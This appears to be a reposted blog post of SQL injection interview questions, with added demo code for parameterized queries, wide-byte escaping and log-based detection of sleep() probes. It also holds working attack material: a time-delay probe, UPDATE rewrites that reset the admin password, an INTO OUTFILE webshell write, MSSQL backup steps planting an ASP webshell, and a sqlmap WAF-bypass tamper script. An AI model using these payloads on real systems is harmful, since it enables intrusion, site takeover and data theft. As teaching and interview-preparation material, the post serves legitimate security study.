SQL injection related [interview questions]

Foreword

This article mainly collects interview questions related to SQL injection and will keep being updated. Of course, because the blogger is short on time, updates may not be very prompt, but believe me: no matter how late, they will come!
Readers are especially asked to follow my blog, or to follow my WeChat public account: Xiaobai learns IT

Interview questions

Common database ports

1. MySQL: 3306
2. SQL Server (MSSQL): 1433
3. Oracle: 1521
4. PostgreSQL: 5432
5. DB2: 50000

What can SQL injection do (what is the harm)?

1. An injection vulnerability in the login module can be combined with a "universal password" to bypass login authentication
2. Obtain data (dump the database) and find the password of the administrator account
3. Read file contents and write files to the server (write a webshell; the website gets a Trojan planted)
4. Destroy the database and cause the website to crash

Types of SQL injection?

1. Classified by the data type of the injection point: numeric, character
2. Classified by the way data is transmitted: GET injection, POST injection, header injection (cookie injection, host injection, user-agent injection, referer injection...)
3. Classified by execution effect: union injection, Boolean injection (Boolean blind injection), error-based injection, time injection (time-based blind injection), stacked query injection, second-order injection, wide byte injection...

MySQL functions commonly used in injection

database() returns the current database name
user() returns the current database user name; alternative: @@user
updatexml() updates an XML document; often used for error-based injection; alternative: extractvalue()
mid() extracts a substring from the specified field
limit returns the first few rows of a result, or rows from the middle
concat() returns the string formed by joining its arguments
group_concat() joins the values of a group into one string; alternative: concat_ws()
count() returns a count of the specified argument
rand() returns a random number in the range 0~1
floor() rounds down
substr() extracts a substring; alternatives: substring(), mid()
ascii() returns the ASCII code of a string
left() returns the specified number of characters from the left of a string
ord() returns the ASCII code of a character
length() returns the length of a string
sleep() delay function

Defense methods for SQL injection

1. Use a safe API
2. Escape the special characters in input
3. Use a whitelist to normalize user input
4. Use a blacklist to normalize user input, for example by not allowing users to enter SQL-like strings such as select
5. On the server side, before the SQL query is submitted to the database, filter, escape, replace, or delete special characters
6. Precompile all SQL statements and bind variables
7. Use security devices such as a WAF for protection

How to deal with escaped characters when injection is blocked

1. Wide byte injection
2. Hex encoding bypass

Why parameterized queries prevent SQL injection

With a parameterized (precompiled, bound-variable) query, the database first compiles the SQL statement, at which point the semantics of the statement to be run are fixed, and only then applies the bound parameter values. In other words, once parameterized queries are used, the value of a parameter cannot change the semantics of the SQL statement: the database only executes the semantics of the already compiled statement.
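The following added example (not from the original post) contrasts a login query built by string splicing with the same query using bound parameters, using an in-memory SQLite table as a stand-in for the site's user table. The "universal password" style input from the first question logs in as admin against the spliced query and is rejected by the parameterized one; the table layout and the helper names are constructed for the demo.

```python
import hashlib
import sqlite3


def sha256(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    # Constructed sample data: two users in an in-memory database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (sha256("S3cret!"),))
    conn.execute("INSERT INTO users VALUES (2, 'alice', ?)", (sha256("hunter2"),))
    return conn


def login_vulnerable(conn, username: str, password: str):
    # Defect on purpose: the username is spliced into the SQL text, so a quote
    # and a comment marker in it rewrite the statement before it is compiled.
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND pw_hash='{sha256(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    # The statement is compiled with two placeholders; the values are bound
    # afterwards and can only be compared as data, never parsed as SQL.
    sql = "SELECT id FROM users WHERE username=? AND pw_hash=?"
    row = conn.execute(sql, (username, sha256(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' --"   # quote closes the literal, -- comments out the password check
    print(login_vulnerable(db, payload, "wrong"))  # 1: logged in as admin
    print(login_safe(db, payload, "wrong"))        # None: rejected
```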

What is the difference between injecting into a website running MySQL 5.0 or above versus below 5.0?

1. Below MySQL 5.0 there is no information_schema database, so table names cannot be enumerated and can only be brute-forced.
2. Below MySQL 5.0, it is multi-user but single-operation.
3. MySQL 5.0 and above is multi-user and multi-operation.

What is blind injection? How is blind injection performed?

1. Blind injection means that when SQL injection is performed, the page does not display (echo) the execution result of the SQL statement. Whether injection exists, and how to exploit it, can only be judged from changes in the content returned by the server and from the response time.
2. Boolean-based (Boolean blind injection) judges whether injection exists by whether the page returns the expected content.
3. Time-based (time or delay injection) judges injection by the difference in server response time (how long the SQL statement takes to execute). The delay can be produced by functions such as benchmark and sleep, or by constructing a joined query over a large Cartesian product.

What is the principle and root cause of wide byte injection?

Byte basics: (1) Single-byte character set: every character is represented by one byte, for example ASCII (0-127); (2) Multi-byte character set: some characters are represented by several bytes and the rest (possibly none) by a single byte.
Principle:
Wide byte injection exploits a characteristic of MySQL: under GBK encoding, two bytes are treated as one Chinese character. When addslashes or magic_quotes_gpc is enabled in PHP, a single quote (0x27) is escaped to \' and the backslash has hex code 0x5c. Under GBK, if a byte such as 0xdf precedes the 0x5c, the two bytes are combined into one Chinese character: the sequence becomes 0xdf5c27, 0xdf5c is consumed as a Chinese character, and the quote (0x27) that follows takes effect again (the escape has been "eaten" by 0xdf). This is the principle of wide byte injection.
Root cause
character_set_client (the client character set) and character_set_connection (the connection-layer character set) differ, or a conversion function such as iconv or mb_convert_encoding is used improperly.
Solution
(1) Use mysql_set_charset('gbk') to specify the character set
(2) Use mysql_real_escape_string for escaping.
The difference between mysql_real_escape_string and addslashes is that the former takes the currently configured character set into account, so mysql_set_charset must be called to specify the character set before mysql_real_escape_string is used.
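As an added illustration of the principle and the fix above (this is not code from the original post), the block below reproduces the 0xdf 0x5c 0x27 case in Python: a byte-oriented escape in the style of addslashes leaves a bare quote once the bytes are decoded as GBK, whereas a charset-aware escape (the role mysql_real_escape_string plays after mysql_set_charset) decodes first and rejects the stray lead byte. The three helper names are my own.

```python
def addslashes_bytes(data: bytes) -> bytes:
    """Byte-oriented escaping like PHP addslashes(): a backslash is put before
    ' " \\ and NUL with no knowledge of the character set in use."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)        # backslash
        out.append(b)
    return bytes(out)


def escape_charset_aware(data: bytes, charset: str = "gbk"):
    """Escape at the character level, as a charset-aware routine does.
    Input that is not valid in the charset is rejected (None) rather than
    passed on; 0xdf followed by 0x27 is not a valid GBK sequence."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)


def bare_quote_after_decoding(escaped: bytes, charset: str = "gbk") -> bool:
    """Decode the escaped bytes the way the server does on a GBK connection
    and report whether a single quote survives without a preceding backslash."""
    text = escaped.decode(charset, errors="replace")
    prev = ""
    for ch in text:
        if ch == "'" and prev != "\\":
            return True
        prev = ch
    return False


if __name__ == "__main__":
    tainted = b"\xdf'"                                   # constructed: 0xdf then a quote
    print(addslashes_bytes(tainted).hex())               # df5c27
    print(bare_quote_after_decoding(addslashes_bytes(tainted)))   # True: escape eaten
    print(escape_charset_aware(tainted))                 # None: rejected before SQL
```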

How to judge delayed injection?

Construct a payload with sleep(); if the response time differs from normal, delayed injection may be present.
For example: ' and sleep(5) --+ ; if the page response time exceeds roughly 5 seconds, delayed injection exists.
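From the defender's side, the same signal (a delay function in the query plus a slow response) can be read out of web server logs. The added example below (not from the original post) parses a few constructed access-log lines, URL-decodes the query string, and flags requests that call sleep() or benchmark(), marking whether the response was slow enough for the delay to have actually run; the log format and all values are made up for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Fields: client IP,
# quoted request line, status, response time in seconds.
SAMPLE_LOG = """\
10.0.0.5 "GET /item.php?id=1 HTTP/1.1" 200 0.031
10.0.0.9 "GET /item.php?id=1%27+and+sleep%285%29--+ HTTP/1.1" 200 5.012
10.0.0.9 "GET /item.php?id=1%27+AND+BENCHMARK%285000000%2CMD5%281%29%29--+ HTTP/1.1" 200 3.870
10.0.0.7 "GET /item.php?id=2 HTTP/1.1" 200 0.044
10.0.0.9 "GET /item.php?id=1%27+and+SLEEP%281%29--+ HTTP/1.1" 200 1.004
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d+) (?P<secs>[\d.]+)$')
# The delay primitives named in the text, matched case-insensitively.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def parse_line(line):
    """Split one log line into fields and URL-decode the request path."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["secs"] = float(rec["secs"])
    rec["decoded"] = unquote_plus(rec["path"])   # %27 -> ', + -> space
    return rec


def flag_time_based(log_text, slow_seconds=1.0):
    """One record per request whose decoded query calls a delay function.
    'slow' is True when the response took at least slow_seconds, i.e. the
    injected delay appears to have executed rather than been filtered."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        m = DELAY_RE.search(rec["decoded"])
        if m:
            hits.append({"ip": rec["ip"], "func": m.group(1).lower(),
                         "secs": rec["secs"], "slow": rec["secs"] >= slow_seconds,
                         "path": rec["decoded"]})
    return hits


if __name__ == "__main__":
    for hit in flag_time_based(SAMPLE_LOG):
        print(hit)
```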

How can blind injection obtain data quickly?

Use DNSLog to assist blind injection

How to exploit injection in an update-only SQL statement?

Suppose the SQL statement containing the injection is as follows:

update user set password='md5($passwd)',page='$page' where id='$id'

Idea: since this is an update-type injection, the idea is to modify something directly. The actual operation may be difficult, but the main idea is given here.
When the injection point is in passwd, the intended SQL statement changes any user's password:

update user set password='md5($passwd)' where username='admin'#',page='$page' where id='$id'

When the injection point is in page, the intended SQL statement changes the user level:

update user set password='md5($passwd)',page='$page', userlevel='1' where id='$id'

When the injection point is in id, the intended SQL statement modifies any user's password directly:

update user set password='md5($passwd)',page='$page' where id='' or username='admin'

The following link has a SQL injection vulnerability. What is your approach to this deformed injection?

test.php?id=AnjNjndm==

The parameter id is most likely base64-encoded. If it is confirmed to be base64-encoded, base64-encode the test payload before testing.

You have found an injection point at test?id=1. What ideas do you have for getting a shell, and what is the priority?

1. With write permission, run sqlmap --os-shell directly to get a shell (it can of course also be written manually)
2. Dump the data, obtain website accounts (preferably an administrator account), and get a shell through an upload vulnerability in the admin back end.
The first has the highest priority and is fastest, but the choice depends on the specific situation.

Common SQLMap parameters?

-u specifies the URL
-r specifies a text file containing the request packet
-m runs GET injection in batch mode
--current-db gets the current database
--tables gets the tables in the specified database
--tamper specifies a tamper script for bypassing
--os-shell gets a shell
--random-agent uses a random User-Agent
Note: only these are listed; beyond that it depends on how familiar you are with sqlmap, so use it often when you have time.

How is an injection point fed to SQLMap?

1. GET injection: sqlmap -u <url> directly
2. POST injection: (1) sqlmap -u <url> --data=<post parameters> (2) sqlmap -r <path to request packet file>
3. Header injection: sqlmap -r <path to request packet file>
Note: for POST injection or header injection, you can mark the injection point with *

Conditions for writing a shell via SQL injection

1. The current database user must have administrator privileges
2. The absolute path of the website must be known
3. A directory writable by the website is required
4. MySQL's secure_file_priv must be configured as empty
Example:

d=1' and 1=2 union select 1,2,'shell内容' into outfile "/www//site//shell.php" %23

Note: using sqlmap --os-shell is more direct

Principle of UDF privilege escalation

MySQL supports user-defined functions (UDF). A malicious user places a DLL (or shared library) containing custom functions into a specific directory, declares functions that the library exports, and then calls those functions to execute system commands.

MSSQL differential backup: how to getshell

Prerequisites:
1. Specific MSSQL privileges: dbo or sa (database backup privilege)
2. Stacked queries are supported
3.
How it works
Once the absolute path of the website is known, take a full backup, then modify the database. The differential backup records everything since the last LSN, so writing the shell into the database and backing up to an .asp file yields a shell.
1. Take a full backup once

backup database 库名 to disk = 'c:\ddd.bak';--

2. Create a table and insert data

create table [dbo].[dtest] ([cmd] [image]);--
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

0x3C25657865637574652872657175657374282261222929253E is the hex encoding of the one-line webshell content: <%execute(request("a"))%>
3. Take a differential backup

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

Ideas for SQL injection bypass (getting past a WAF)

1. Inline-comment bypass
2. Padding with junk ("dirty") data
3. Changing the request method, e.g. GET to POST
4. Random User-Agent bypass
5. Fuzzing the filter and substituting equivalent functions
6. sqlmap tamper scripts that implement the above ideas

How to write a SQLMap tamper script

Template for writing a tamper script

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    # sqlmap uses the return value as the (possibly rewritten) payload
    return payload

__priority__
Defines the priority of the tamper; it takes effect when multiple tampers are used together. The levels are listed below: the larger the value, the higher the priority

    LOWEST = -100
    LOWER = -50
    LOW = -10
    NORMAL = 0
    HIGH = 10
    HIGHER = 50
    HIGHEST = 100

dependencies

Used to warn the user about the applicable scope of the tamper. The code is as follows:

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
import os

__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("过狗tamper '%s' 只针对 %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

DBMS.MYSQL stands for MySQL; the other databases follow by analogy.
tamper is the key function, used to define the rewriting rules; example code:

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def tamper(payload, **kwargs):
    # Rewrite keywords in the payload with MySQL version-comment variants
    payload = payload.replace('AND', '/*!29450AND*/')
    payload = payload.replace('ORDER', '/*!29450order*/')
    payload = payload.replace('LIKE USER()', 'like (user/**/())')
    payload = payload.replace('DATABASE()', 'database/*!29450*/()')
    payload = payload.replace('CURRENT_USER()', 'CURRENT_USER/**/()')
    payload = payload.replace('SESSION_USER()', 'SESSION_USER(%0a)')
    payload = payload.replace('UNION ALL SELECT', 'union/*!29450select*/')
    payload = payload.replace('super_priv', '/*!29450/**/super_priv*/')
    payload = payload.replace('and host=', '/*!29450and*/host/*!11440=*/')
    payload = payload.replace('BENCHMARK(', 'BENCHMARK/*!29450*/(')
    payload = payload.replace('SLEEP(', 'sleep/**/(')
    # The rewritten payload must be returned, otherwise sqlmap receives None
    return payload

Origin blog.csdn.net/weixin_42380348/article/details/121781562